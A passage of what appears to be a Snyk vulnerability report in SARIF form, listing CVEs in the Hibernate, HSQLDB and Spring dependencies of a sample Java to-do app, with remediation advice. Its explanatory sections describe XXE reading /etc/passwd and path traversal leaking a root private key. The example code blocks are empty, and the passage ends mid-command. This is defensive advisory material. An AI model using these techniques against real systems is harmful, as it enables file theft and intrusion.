This flaw could allow an attacker to access unauthorized information or possibly conduct further attacks.\n# Remediation\nUpgrade `org.hibernate:hibernate-core` to version 5.3.18.Final, 5.4.18.Final or higher.\n# References\n- [GitHub Pull Request](https://github.com/hibernate/hibernate-orm/pull/3438)\n- [Jira Ticket](https://hibernate.atlassian.net/browse/HHH-14077)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-89", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-ORGHIBERNATE-30098", + "shortDescription": { + "text": "Medium severity - JSM bypass via ReflectionHelper vulnerability in org.hibernate:hibernate-validator" + }, + "fullDescription": { + "text": "(CVE-2014-3558) org.hibernate:hibernate-validator@4.3.1.Final" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: org.hibernate:hibernate-validator\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › org.hibernate:hibernate-validator@4.3.1.Final\n# Overview\n[org.hibernate:hibernate-validator](https://mvnrepository.com/artifact/org.hibernate/hibernate-validator) is a Hibernate Validator Engine Relocation Artifact.\n\nAffected versions of this package are vulnerable to JSM bypass via ReflectionHelper. 
ReflectionHelper (`org.hibernate.validator.util.ReflectionHelper`) in Hibernate Validator 4.1.0 before 4.2.1, 4.3.x before 4.3.2, and 5.x before 5.1.2 allows attackers to bypass Java Security Manager (JSM) restrictions and execute restricted reflection calls via a crafted application.\n# Remediation\nUpgrade `org.hibernate:hibernate-validator` to version 4.3.2.Final, 5.1.2.Final or higher.\n# References\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/2c95d4ea0ef20977be249e31a4a4f4f4f71c945d)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/67fdff14831c035c25e098fe14bd86523d17f726)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/7e7131939a4361a7cad3e77ab89a8462132c561c)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/c489416f699a46859c134796b3ccfea41ef3ce52)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/c9525ca544b1281e2b7c7347e86e87c86dc1dc6e)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/e8c42b689df8c6752d635d02c6518da3fece3870)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/f97c2021a03c825abdeca1692f5be51e77e76a8f)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/fd4eaed7fb930db6a5e4c03742b4b3adcfecc90e)\n- [Jira Issue](https://hibernate.atlassian.net/browse/HV-912)\n- [Redhat Bugzilla](https://bugzilla.redhat.com/CVE-2014-3558)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-592", + "maven" + ], + "cvssv3_baseScore": 5.3, + "security-severity": "5.3" + } + }, + { + "id": "SNYK-JAVA-ORGHIBERNATE-568162", + "shortDescription": { + "text": "Medium severity - Improper Input Validation vulnerability in org.hibernate:hibernate-validator" + }, + "fullDescription": { + "text": "(CVE-2020-10693) org.hibernate:hibernate-validator@4.3.1.Final" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: 
org.hibernate:hibernate-validator\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › org.hibernate:hibernate-validator@4.3.1.Final\n# Overview\n[org.hibernate:hibernate-validator](https://mvnrepository.com/artifact/org.hibernate/hibernate-validator) is a Hibernate Validator Engine Relocation Artifact.\n\nAffected versions of this package are vulnerable to Improper Input Validation. A bug in the message interpolation processor enables invalid EL expressions to be evaluated as if they were valid. This flaw allows attackers to bypass input sanitation (escaping, stripping) controls that developers may have put in place when handling user-controlled data in error messages.\n# Remediation\nUpgrade `org.hibernate:hibernate-validator` to version 6.0.19.Final, 6.1.3.Final or higher.\n# References\n- [GitHub PR](https://github.com/hibernate/hibernate-validator/pull/1071)\n- [Jira Issue](https://hibernate.atlassian.net/browse/HV-1758)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1805501)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-20", + "maven" + ], + "cvssv3_baseScore": 5.3, + "security-severity": "5.3" + } + }, + { + "id": "SNYK-JAVA-ORGHIBERNATE-569100", + "shortDescription": { + "text": "Medium severity - Cross-site Scripting (XSS) vulnerability in org.hibernate:hibernate-validator" + }, + "fullDescription": { + "text": "(CVE-2019-10219) org.hibernate:hibernate-validator@4.3.1.Final" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: org.hibernate:hibernate-validator\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: 
io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › org.hibernate:hibernate-validator@4.3.1.Final\n# Overview\n[org.hibernate:hibernate-validator](https://mvnrepository.com/artifact/org.hibernate/hibernate-validator) is a Hibernate Validator Engine Relocation Artifact.\n\nAffected versions of this package are vulnerable to Cross-site Scripting (XSS). The `SafeHtml` validator annotation fails to properly sanitize payloads consisting of potentially malicious code in HTML comments and instructions.\n# Details\n\nA cross-site scripting attack occurs when the attacker tricks a legitimate web-based application or site to accept a request as originating from a trusted source.\n\nThis is done by escaping the context of the web application; the web application then delivers that data to its users along with other trusted dynamic content, without validating it. The browser unknowingly executes malicious script on the client side (through client-side languages; usually JavaScript or HTML) in order to perform actions that are otherwise typically blocked by the browser’s Same Origin Policy.\n\nInjecting malicious code is the most prevalent manner by which XSS is exploited; for this reason, escaping characters in order to prevent this manipulation is the top method for securing code against this vulnerability.\n\nEscaping means that the application is coded to mark key characters, and particularly key characters included in user input, to prevent those characters from being interpreted in a dangerous context. For example, in HTML, `<` can be coded as `<`; and `>` can be coded as `>`; in order to be interpreted and displayed as themselves in text, while within the code itself, they are used for HTML tags. 
If malicious content is injected into an application that escapes special characters and that malicious content uses `<` and `>` as HTML tags, those characters are nonetheless not interpreted as HTML tags by the browser if they’ve been correctly escaped in the application code and in this way the attempted attack is diverted.\n \nThe most prominent use of XSS is to steal cookies (source: OWASP HttpOnly) and hijack user sessions, but XSS exploits have been used to expose sensitive information, enable access to privileged services and functionality and deliver malware. \n\n## Types of attacks\nThere are a few methods by which XSS can be manipulated:\n\n|Type|Origin|Description|\n|--|--|--|\n|**Stored**|Server|The malicious code is inserted in the application (usually as a link) by the attacker. The code is activated every time a user clicks the link.|\n|**Reflected**|Server|The attacker delivers a malicious link externally from the vulnerable web site application to a user. When clicked, malicious code is sent to the vulnerable web site, which reflects the attack back to the user’s browser.| \n|**DOM-based**|Client|The attacker forces the user’s browser to render a malicious page. The data in the page itself delivers the cross-site scripting data.|\n|**Mutated**| |The attacker injects code that appears safe, but is then rewritten and modified by the browser, while parsing the markup. 
An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters.|\n\n## Affected environments\nThe following environments are susceptible to an XSS attack:\n\n* Web servers\n* Application servers\n* Web application environments\n\n## How to prevent\nThis section describes the top best practices designed to specifically protect your code: \n\n* Sanitize data input in an HTTP request before reflecting it back, ensuring all data is validated, filtered or escaped before echoing anything back to the user, such as the values of query parameters during searches. \n* Convert special characters such as `?`, `&`, `/`, `<`, `>` and spaces to their respective HTML or URL encoded equivalents. \n* Give users the option to disable client-side scripts.\n* Redirect invalid requests.\n* Detect simultaneous logins, including those from two separate IP addresses, and invalidate those sessions.\n* Use and enforce a Content Security Policy (source: Wikipedia) to disable any features that might be manipulated for an XSS attack.\n* Read the documentation for any of the libraries referenced in your code to understand which elements allow for embedded HTML.\n\n# Remediation\nUpgrade `org.hibernate:hibernate-validator` to version 6.0.18.Final, 6.1.0.Final or higher.\n# References\n- [Apache Security Advisory](https://lists.apache.org/thread.html/r87b7e2d22982b4ca9f88f5f4f22a19b394d2662415b233582ed22ebf@%3Cnotifications.accumulo.apache.org%3E)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/124b7dd6d9a4ad24d4d49f74701f05a13e56ceee)\n- [Hibernator Security Release Blog](https://in.relation.to/2019/11/20/hibernate-validator-610-6018-released/)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-10219)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-79", + "maven" + ], + "cvssv3_baseScore": 6.5, + "security-severity": "6.5" + } + }, + { + "id": "SNYK-JAVA-ORGHSQLDB-3040860", + 
"shortDescription": { + "text": "High severity - Remote Code Execution (RCE) vulnerability in org.hsqldb:hsqldb" + }, + "fullDescription": { + "text": "(CVE-2022-41853) org.hsqldb:hsqldb@2.3.2" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: org.hsqldb:hsqldb\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › io.github.snyk:todolist-core@0.0.1-SNAPSHOT › org.hsqldb:hsqldb@2.3.2\n# Overview\n\nAffected versions of this package are vulnerable to Remote Code Execution (RCE) when using `java.sql.Statement` or `java.sql.PreparedStatement` to process untrusted input. By default, it is allowed to call any static method of any Java class in the classpath resulting in code execution.\n\n# Workaround\nUsers who are unable to upgrade to the fixed version can set the system property `hsqldb.method_class_names` to classes which are allowed to be called. 
For example, `System.setProperty(\"hsqldb.method_class_names\", \"abc\")` or Java argument `-Dhsqldb.method_class_names=\"abc\"` can be used.\n# Remediation\nUpgrade `org.hsqldb:hsqldb` to version 2.7.1 or higher.\n# References\n- [Chromium Bugs](https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=50212#c7)\n- [GitHub Commit](https://github.com/ryenus/hsqldb/commit/b6719c67b41eb9298c2451ad2829bf03b262a941)\n- [Mitigation](http://hsqldb.org/doc/2.0/guide/sqlroutines-chapt.html#src_jrt_access_control)\n- [SVN Commit](https://sourceforge.net/p/hsqldb/svn/6614/tree//base/trunk/src/org/hsqldb/persist/HsqlDatabaseProperties.java)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-94", + "maven" + ], + "cvssv3_baseScore": 8, + "security-severity": "8" + } + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-1009832", + "shortDescription": { + "text": "High severity - Improper Input Validation vulnerability in org.springframework:spring-web" + }, + "fullDescription": { + "text": "(CVE-2020-5421) org.springframework:spring-web@3.2.6.RELEASE" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: org.springframework:spring-web\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT and org.springframework:spring-web@3.2.6.RELEASE\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › org.springframework:spring-web@3.2.6.RELEASE\n# Overview\n[org.springframework:spring-web](https://github.com/spring-projects/spring-framework) is a package that provides a comprehensive programming and configuration model for modern Java-based enterprise applications - on any kind of deployment platform.\n\nAffected versions of this package are vulnerable to Improper Input Validation. 
The protections against Reflected File Download attacks from CVE-2015-5211 may be bypassed depending on the browser used through the use of a `jsessionid` path parameter.\n# Remediation\nUpgrade `org.springframework:spring-web` to version 4.3.29.RELEASE, 5.0.19.RELEASE, 5.1.18.RELEASE, 5.2.9.RELEASE or higher.\n# References\n- [CVE-2015-5211](https://tanzu.vmware.com/security/cve-2015-5211)\n- [Pivotal Security Advisory](https://pivotal.io/security/cve-2020-5421)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-20", + "maven" + ], + "cvssv3_baseScore": 8.6, + "security-severity": "8.6" + } + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-30163", + "shortDescription": { + "text": "High severity - XML External Entity (XXE) Injection vulnerability in org.springframework:spring-web" + }, + "fullDescription": { + "text": "(CVE-2014-0225) org.springframework:spring-web@3.2.6.RELEASE" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: org.springframework:spring-web\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT and org.springframework:spring-web@3.2.6.RELEASE\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › org.springframework:spring-web@3.2.6.RELEASE\n# Overview\n[org.springframework:spring-web](https://github.com/spring-projects/spring-framework) is a package that provides a comprehensive programming and configuration model for modern Java-based enterprise applications - on any kind of deployment platform.\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection. This is due to not disabling the resolution of URI references by default in a DTD declaration. 
This occurs only when processing user provided XML documents.\n\n# Details\nXXE Injection is a type of attack against an application that parses XML input.\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\n\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\n\nFor example, below is a sample XML document, containing an XML element- username.\n\n```\n\n\n John\n\n```\n\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. 
For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\n\n```\n\n\n]>\n &xxe;\n\n```\n\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n# Remediation\nUpgrade `org.springframework:spring-web` to version 3.2.9.RELEASE, 4.0.5.RELEASE or higher.\n# References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/8e096aeef55287dc829484996c9330cf755891a1)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/c6503ebbf7c9e21ff022c58706dbac5417b2b5eb)\n- [GitHub Issue](https://github.com/spring-projects/spring-framework/issues/16390)\n- [Pivotal Security](http://www.gopivotal.com/security/cve-2014-0225)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2014-0225)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-611", + "maven" + ], + "cvssv3_baseScore": 8.8, + "security-severity": "8.8" + } + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-30164", + "shortDescription": { + "text": "Medium severity - Denial of Service (DoS) vulnerability in org.springframework:spring-web" + }, + "fullDescription": { + "text": "(CVE-2015-3192) org.springframework:spring-web@3.2.6.RELEASE" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: org.springframework:spring-web\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT and org.springframework:spring-web@3.2.6.RELEASE\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › org.springframework:spring-web@3.2.6.RELEASE\n# Overview\n[org.springframework:spring-web](https://github.com/spring-projects/spring-framework) is a package that provides a comprehensive programming and configuration model for modern Java-based enterprise applications - on 
any kind of deployment platform.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS). It does not properly process inline DTD declarations when DTD is not entirely disabled, which allows remote attackers to cause a denial of service (memory consumption and out-of-memory errors) via a crafted XML file.\n\n# Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. 
For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n# Remediation\nUpgrade `org.springframework:spring-web` to version 3.2.14.RELEASE, 4.1.7.RELEASE or higher.\n# References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/5a711c05ec750f069235597173084c2ee796242)\n- [GitHub Issue](https://github.com/spring-projects/spring-framework/issues/17727)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-3192)\n- [Pivotal Security](http://pivotal.io/security/cve-2015-3192)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-119", + "maven" + ], + "cvssv3_baseScore": 5.5, + "security-severity": "5.5" + } + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-30165", + "shortDescription": { + "text": "High severity - Reflected File Download vulnerability in org.springframework:spring-web" + }, + "fullDescription": { + "text": "(CVE-2015-5211) org.springframework:spring-web@3.2.6.RELEASE" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: org.springframework:spring-web\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT and org.springframework:spring-web@3.2.6.RELEASE\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › org.springframework:spring-web@3.2.6.RELEASE\n# Overview\n\n[org.springframework:spring-web](https://github.com/spring-projects/spring-framework) package that provides a comprehensive programming and configuration model for modern Java-based enterprise applications - on any kind of deployment platform.\n\n\nAffected versions of this package are vulnerable to Reflected File Download\nvia a crafted URL with a batch script extension, resulting in the response being downloaded rather than rendered.\n\n# Remediation\n\nUpgrade `org.springframework:spring-web` to version 3.2.15.RELEASE, 4.1.8.RELEASE, 4.2.2.RELEASE or higher.\n\n\n# References\n\n- [GitHub 
Commit](https://github.com/spring-projects/spring-framework/commit/03f547eb9868f48f44d59b56067d4ac4740672c3)\n\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/2bd1daa75ee0b8ec33608ca6ab065ef3e1815543)\n\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/a95c3d820dbc4c3ae752f1b3ee22ee860b162402)\n\n- [GitHub Issue](https://github.com/spring-projects/spring-framework/issues/18124)\n\n- [Oren Hafif Blog](https://www.trustwave.com/Resources/SpiderLabs-Blog/Reflected-File-Download---A-New-Web-Attack-Vector/)\n\n- [Pivotal Security](http://pivotal.io/security/cve-2015-5211)\n\n- [RedHat CVE Database](https://access.redhat.com/security/cve/cve-2015-5211)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-494", + "maven" + ], + "cvssv3_baseScore": 8.6, + "security-severity": "8.6" + } + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-31331", + "shortDescription": { + "text": "Medium severity - Cross-site Request Forgery (CSRF) vulnerability in org.springframework:spring-web" + }, + "fullDescription": { + "text": "(CVE-2014-0054) org.springframework:spring-web@3.2.6.RELEASE" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: org.springframework:spring-web\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT and org.springframework:spring-web@3.2.6.RELEASE\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › org.springframework:spring-web@3.2.6.RELEASE\n# Overview\r\n[`org.springframework:spring-web`](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22spring-web%22)\r\nAffected versions of this package do not disable external entity resolution, which allows remote attackers to read arbitrary files, cause a denial of service and conduct CSRF attacks via crafted XML, aka an XML External Entity (XXE) issue. 
\r\n\r\n**NOTE:** this vulnerability exists because of an incomplete fix for [CVE-2013-4152](https://snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORK-31330), [CVE-2013-7315](https://snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORK-30162), and [CVE-2013-6429](https://snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORK-30160).\r\n\r\n# References\r\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0054)" + }, + "properties": { + "tags": [ + "security", + "CWE-352", + "maven" + ], + "cvssv3_baseScore": 6.3, + "security-severity": "6.3" + } + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-6261586", + "shortDescription": { + "text": "High severity - Open Redirect vulnerability in org.springframework:spring-web" + }, + "fullDescription": { + "text": "(CVE-2024-22243) org.springframework:spring-web@3.2.6.RELEASE" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: org.springframework:spring-web\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT and org.springframework:spring-web@3.2.6.RELEASE\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › org.springframework:spring-web@3.2.6.RELEASE\n# Overview\n[org.springframework:spring-web](https://github.com/spring-projects/spring-framework) is a package that provides a comprehensive programming and configuration model for modern Java-based enterprise applications - on any kind of deployment platform.\n\nAffected versions of this package are vulnerable to Open Redirect when `UriComponentsBuilder` parses an externally provided URL, and the application subsequently uses that URL. 
If it contains hierarchical components such as path, query, and fragment it may evade validation.\n# Remediation\nUpgrade `org.springframework:spring-web` to version 5.3.32, 6.0.17, 6.1.4 or higher.\n# References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/120ea0a51c63171e624ca55dbd7cae627d53a042)\n- [Spring Advisory](https://spring.io/security/cve-2024-22243)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-601", + "CWE-918", + "maven" + ], + "cvssv3_baseScore": 7.1, + "security-severity": "7.1" + } + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-6444790", + "shortDescription": { + "text": "High severity - Open Redirect vulnerability in org.springframework:spring-web" + }, + "fullDescription": { + "text": "(CVE-2024-22259) org.springframework:spring-web@3.2.6.RELEASE" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: org.springframework:spring-web\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT and org.springframework:spring-web@3.2.6.RELEASE\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › org.springframework:spring-web@3.2.6.RELEASE\n# Overview\n[org.springframework:spring-web](https://github.com/spring-projects/spring-framework) is a package that provides a comprehensive programming and configuration model for modern Java-based enterprise applications - on any kind of deployment platform.\n\nAffected versions of this package are vulnerable to Open Redirect when using `UriComponentsBuilder` to parse an externally provided `URL` and perform validation checks on the host of the parsed URL. 
\r\n\r\n**Note:**\r\nThis is the same as [CVE-2024-22243](https://security.snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORK-6261586), but with different input.\n# Remediation\nUpgrade `org.springframework:spring-web` to version 5.3.33, 6.0.18, 6.1.5 or higher.\n# References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/1d2b55e670bcdaa19086f6af9a5cec31dd0390f0)\n- [Spring Advisory](https://spring.io/security/cve-2024-22259)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-601", + "maven" + ], + "cvssv3_baseScore": 7.1, + "security-severity": "7.1" + } + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-6597980", + "shortDescription": { + "text": "Medium severity - Open Redirect vulnerability in org.springframework:spring-web" + }, + "fullDescription": { + "text": "(CVE-2024-22262) org.springframework:spring-web@3.2.6.RELEASE" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: org.springframework:spring-web\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT and org.springframework:spring-web@3.2.6.RELEASE\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › org.springframework:spring-web@3.2.6.RELEASE\n# Overview\n[org.springframework:spring-web](https://github.com/spring-projects/spring-framework) is a package that provides a comprehensive programming and configuration model for modern Java-based enterprise applications - on any kind of deployment platform.\n\nAffected versions of this package are vulnerable to Open Redirect when `UriComponentsBuilder` is used to parse an externally provided URL and perform validation checks on the host of the parsed URL. 
\n\n**Note:**\nThis is the same as [CVE-2024-22259](https://security.snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORK-6444790) and [CVE-2024-22243](https://security.snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORK-6261586), but with different input.\n# Remediation\nUpgrade `org.springframework:spring-web` to version 5.3.34, 6.0.19, 6.1.6 or higher.\n# References\n- [Spring Advisory](https://spring.io/security/cve-2024-22262)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-601", + "maven" + ], + "cvssv3_baseScore": 5.4, + "security-severity": "5.4" + } + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2329097", + "shortDescription": { + "text": "Medium severity - Improper Output Neutralization for Logs vulnerability in org.springframework:spring-core" + }, + "fullDescription": { + "text": "(CVE-2021-22096) org.springframework:spring-core@3.2.6.RELEASE" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: org.springframework:spring-core\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, org.springframework:spring-web@3.2.6.RELEASE and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › org.springframework:spring-web@3.2.6.RELEASE › org.springframework:spring-core@3.2.6.RELEASE\n# Overview\n[org.springframework:spring-core](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22spring-core%22) is a core package within the spring-framework that contains multiple classes and utilities.\n\nAffected versions of this package are vulnerable to Improper Output Neutralization for Logs when a user provides malicious input, causing insertion of additional log entries.\n# Remediation\nUpgrade `org.springframework:spring-core` to version 5.3.12, 5.2.18 or higher.\n# References\n- [Github Commit](https://github.com/spring-projects/spring-framework/commit/346b75580267dc5d8d257be198d5841ce4e1add5)\n- [Pivotal Security Advisory](https://pivotal.io/security/cve-2021-22096)\n" + }, + 
"properties": { + "tags": [ + "security", + "CWE-20", + "maven" + ], + "cvssv3_baseScore": 4.3, + "security-severity": "4.3" + } + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2330878", + "shortDescription": { + "text": "Medium severity - Improper Input Validation vulnerability in org.springframework:spring-core" + }, + "fullDescription": { + "text": "(CVE-2021-22060) org.springframework:spring-core@3.2.6.RELEASE" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: org.springframework:spring-core\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, org.springframework:spring-web@3.2.6.RELEASE and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › org.springframework:spring-web@3.2.6.RELEASE › org.springframework:spring-core@3.2.6.RELEASE\n# Overview\n[org.springframework:spring-core](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22spring-core%22) is a core package within the spring-framework that contains multiple classes and utilities.\n\nAffected versions of this package are vulnerable to Improper Input Validation when a user provides malicious input, causing insertion of additional log entries.\n# Remediation\nUpgrade `org.springframework:spring-core` to version 5.2.19.RELEASE, 5.3.14 or higher.\n# References\n- [Pivotal Security Advisory](https://pivotal.io/security/cve-2021-22060)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-20", + "maven" + ], + "cvssv3_baseScore": 4.3, + "security-severity": "4.3" + } + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-31325", + "shortDescription": { + "text": "Medium severity - Directory Traversal vulnerability in org.springframework:spring-core" + }, + "fullDescription": { + "text": "(CVE-2014-3578) org.springframework:spring-core@3.2.6.RELEASE" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: org.springframework:spring-core\n* Introduced through: 
io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, org.springframework:spring-web@3.2.6.RELEASE and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › org.springframework:spring-web@3.2.6.RELEASE › org.springframework:spring-core@3.2.6.RELEASE\n# Overview\n[org.springframework:spring-core](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22spring-core%22) is a core package within the spring-framework that contains multiple classes and utilities.\n\nAffected versions of this package are vulnerable to Directory Traversal. It allows remote attackers to read arbitrary files via a crafted URL.\n\n# Details\n\nA Directory Traversal attack (also known as path traversal) aims to access files and directories that are stored outside the intended folder. By manipulating files with \"dot-dot-slash (../)\" sequences and its variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system, including application source code, configuration, and other critical system files.\n\nDirectory Traversal vulnerabilities can be generally divided into two types:\n\n- **Information Disclosure**: Allows the attacker to gain information about the folder structure or read the contents of sensitive files on the system.\n\n`st` is a module for serving static files on web pages, and contains a [vulnerability of this type](https://snyk.io/vuln/npm:st:20140206). In our example, we will serve files from the `public` route.\n\nIf an attacker requests the following URL from our server, it will in turn leak the sensitive private key of the root user.\n\n```\ncurl 